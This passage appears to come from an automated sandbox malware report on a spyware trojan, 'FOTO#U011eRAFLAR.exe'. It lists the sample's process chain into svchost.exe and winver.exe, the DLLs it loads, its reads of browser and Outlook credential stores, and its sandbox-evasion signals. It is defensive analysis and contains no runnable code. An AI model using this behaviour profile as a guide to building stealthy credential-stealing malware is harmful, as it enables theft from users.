                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B57D736_2_04B57D73
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AA3D406_2_04AA3D40
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B51D5A6_2_04B51D5A
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AA9EB06_2_04AA9EB0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B5FFB16_2_04B5FFB1
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AA1F926_2_04AA1F92
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04A63FD56_2_04A63FD5
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04A63FD26_2_04A63FD2
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B5FF096_2_04B5FF09
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AA38E06_2_04AA38E0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B0D8006_2_04B0D800
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B359106_2_04B35910
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AA99506_2_04AA9950
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04ABB9506_2_04ABB950
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04AE5AA06_2_04AE5AA0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B41AA36_2_04B41AA3
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B3DAAC6_2_04B3DAAC
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B4DAC66_2_04B4DAC6
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B13A6C6_2_04B13A6C
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B57A466_2_04B57A46
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B5FA496_2_04B5FA49
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04ABFB806_2_04ABFB80
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B15BF06_2_04B15BF0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04ADDBF96_2_04ADDBF9
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04B5FB766_2_04B5FB76
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_00841F606_2_00841F60
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0083CEC86_2_0083CEC8
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0083CED06_2_0083CED0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0083D0F06_2_0083D0F0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0083B1706_2_0083B170
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0083B2B46_2_0083B2B4
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_008455606_2_00845560
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_008437B06_2_008437B0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0085BAD06_2_0085BAD0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0460E4C36_2_0460E4C3
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0460E3A86_2_0460E3A8
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0460E85C6_2_0460E85C
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0460D9286_2_0460D928
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0460CB176_2_0460CB17
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0460CBC86_2_0460CBC8
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: String function: 00D13536 appears 31 times
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: String function: 00D1B606 appears 32 times
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: String function: 00D348F3 appears 49 times
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: String function: 00D309B0 appears 46 times
                Source: C:\Windows\SysWOW64\winver.exeCode function: String function: 04B1F290 appears 103 times
                Source: C:\Windows\SysWOW64\winver.exeCode function: String function: 04AD5130 appears 58 times
                Source: C:\Windows\SysWOW64\winver.exeCode function: String function: 04B0EA12 appears 86 times
                Source: C:\Windows\SysWOW64\winver.exeCode function: String function: 04A8B970 appears 262 times
                Source: C:\Windows\SysWOW64\winver.exeCode function: String function: 04AE7E54 appears 107 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03887E54 appears 107 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0382B970 appears 262 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 038AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 038BF290 appears 103 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03875130 appears 58 times
                Source: FOTO#U011eRAFLAR.exe, 00000000.00000003.1694633191.0000000003B2D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs FOTO#U011eRAFLAR.exe
                Source: FOTO#U011eRAFLAR.exe, 00000000.00000003.1693971355.0000000003983000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs FOTO#U011eRAFLAR.exe
                Source: FOTO#U011eRAFLAR.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@11/10
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D836D3 GetLastError,FormatMessageW,0_2_00D836D3
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D71003 AdjustTokenPrivileges,CloseHandle,0_2_00D71003
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D71607 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00D71607
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D850EB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00D850EB
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D9A5A3 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00D9A5A3
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D863AC _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_00D863AC
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D16122 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00D16122
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeFile created: C:\Users\user\AppData\Local\Temp\hypopygidiumJump to behavior
                Source: FOTO#U011eRAFLAR.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: winver.exe, 00000006.00000002.3545292765.0000000000C82000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: FOTO#U011eRAFLAR.exeReversingLabs: Detection: 71%
                Source: unknownProcess created: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exe "C:\Users\user\Desktop\FOTO#U011eRAFLAR.exe"
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\FOTO#U011eRAFLAR.exe"
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeProcess created: C:\Windows\SysWOW64\winver.exe "C:\Windows\SysWOW64\winver.exe"
                Source: C:\Windows\SysWOW64\winver.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\FOTO#U011eRAFLAR.exe"Jump to behavior
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeProcess created: C:\Windows\SysWOW64\winver.exe "C:\Windows\SysWOW64\winver.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\winver.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\winver.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: FOTO#U011eRAFLAR.exeStatic file information: File size 1600512 > 1048576
                Source: FOTO#U011eRAFLAR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: FOTO#U011eRAFLAR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: FOTO#U011eRAFLAR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: FOTO#U011eRAFLAR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: FOTO#U011eRAFLAR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: FOTO#U011eRAFLAR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: FOTO#U011eRAFLAR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: winver.pdb source: svchost.exe, 00000001.00000003.1980070090.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1980124475.000000000323B000.00000004.00000020.00020000.00000000.sdmp, GhotoFFnRo.exe, 00000005.00000002.3545608911.0000000000E48000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: GhotoFFnRo.exe, 00000005.00000000.1938013471.0000000000BBE000.00000002.00000001.01000000.00000005.sdmp, GhotoFFnRo.exe, 00000007.00000002.3545711657.0000000000BBE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: FOTO#U011eRAFLAR.exe, 00000000.00000003.1694500272.0000000003860000.00000004.00001000.00020000.00000000.sdmp, FOTO#U011eRAFLAR.exe, 00000000.00000003.1695007879.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2011442081.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1919020737.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1920958794.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2011442081.000000000399E000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000006.00000003.2014121501.00000000048B5000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000006.00000003.2011547954.0000000004708000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000006.00000002.3546458580.0000000004BFE000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000006.00000002.3546458580.0000000004A60000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: FOTO#U011eRAFLAR.exe, 00000000.00000003.1694500272.0000000003860000.00000004.00001000.00020000.00000000.sdmp, FOTO#U011eRAFLAR.exe, 00000000.00000003.1695007879.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2011442081.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1919020737.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1920958794.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2011442081.000000000399E000.00000040.00001000.00020000.00000000.sdmp, winver.exe, winver.exe, 00000006.00000003.2014121501.00000000048B5000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000006.00000003.2011547954.0000000004708000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000006.00000002.3546458580.0000000004BFE000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000006.00000002.3546458580.0000000004A60000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: winver.pdbGCTL source: svchost.exe, 00000001.00000003.1980070090.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1980124475.000000000323B000.00000004.00000020.00020000.00000000.sdmp, GhotoFFnRo.exe, 00000005.00000002.3545608911.0000000000E48000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: winver.exe, 00000006.00000002.3545292765.0000000000C05000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000006.00000002.3547176638.000000000508C000.00000004.10000000.00040000.00000000.sdmp, GhotoFFnRo.exe, 00000007.00000002.3546321653.0000000002A9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2310345131.000000002248C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: winver.exe, 00000006.00000002.3545292765.0000000000C05000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000006.00000002.3547176638.000000000508C000.00000004.10000000.00040000.00000000.sdmp, GhotoFFnRo.exe, 00000007.00000002.3546321653.0000000002A9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2310345131.000000002248C000.00000004.80000000.00040000.00000000.sdmp
                Source: FOTO#U011eRAFLAR.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: FOTO#U011eRAFLAR.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: FOTO#U011eRAFLAR.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: FOTO#U011eRAFLAR.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: FOTO#U011eRAFLAR.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D1615E GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00D1615E
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D309F6 push ecx; ret 0_2_00D30A09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00419013 push FFFFFFD4h; retf 26A5h1_2_004190C1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041903F push FFFFFFD4h; retf 26A5h1_2_004190C1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004138E3 push esi; ret 1_2_004138EE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00412939 push ebp; retf 1_2_0041293A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418A74 push edi; retf 1_2_00418A8D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418A1C push edi; retf 1_2_00418A8D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418A2E push edi; retf 1_2_00418A8D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00401B9E push ebp; ret 1_2_00401B9F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041AD68 push eax; retf 1_2_0041AD6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403570 push eax; ret 1_2_00403572
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418507 push ebx; retf 1_2_0041850E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041EDC8 push ebp; iretd 1_2_0041EE0F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004195D0 push ss; ret 1_2_004195DA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041EDFC push ebp; iretd 1_2_0041EE0F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004195AB push cs; iretd 1_2_004195C2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416633 push ss; iretd 1_2_00416687
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041F747 push edi; ret 1_2_0041F755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041EF8E push edi; retf 1_2_0041EF8F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0380225F pushad ; ret 1_2_038027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038027FA pushad ; ret 1_2_038027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038309AD push ecx; mov dword ptr [esp], ecx1_2_038309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0380283D push eax; iretd 1_2_03802858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03801368 push eax; iretd 1_2_03801369
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeCode function: 5_2_02E98095 push ebp; retf 5_2_02E98096
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeCode function: 5_2_02E9903F push esi; ret 5_2_02E9904A
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeCode function: 5_2_02EA46EA push edi; retf 5_2_02EA46EB
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeCode function: 5_2_02EA4EA3 push edi; ret 5_2_02EA4EB1
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeCode function: 5_2_02E9E76F push FFFFFFD4h; retf 26A5h5_2_02E9E81D
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeCode function: 5_2_02EA04C4 push eax; retf 5_2_02EA04CB
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeCode function: 5_2_02E9DC63 push ebx; retf 5_2_02E9DC6A
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D2EFAD GetForegroundWindow,FindWindowW,IsIconic,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,ShowWindow,0_2_00D2EFAD
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00DA1B74 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00DA1B74
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-92816
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeAPI/Special instruction interceptor: Address: 1237AB4
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0387096E rdtsc 1_2_0387096E
                Source: C:\Windows\SysWOW64\winver.exeWindow / User API: threadDelayed 2811Jump to behavior
                Source: C:\Windows\SysWOW64\winver.exeWindow / User API: threadDelayed 7161Jump to behavior
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeAPI coverage: 3.7 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
                Source: C:\Windows\SysWOW64\winver.exeAPI coverage: 2.6 %
                Source: C:\Windows\SysWOW64\winver.exe TID: 7924Thread sleep count: 2811 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\winver.exe TID: 7924Thread sleep time: -5622000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\winver.exe TID: 7924Thread sleep count: 7161 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\winver.exe TID: 7924Thread sleep time: -14322000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe TID: 7944Thread sleep time: -55000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe TID: 7944Thread sleep time: -36000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\winver.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D868AD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00D868AD
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D8680C FindFirstFileW,FindClose,0_2_00D8680C
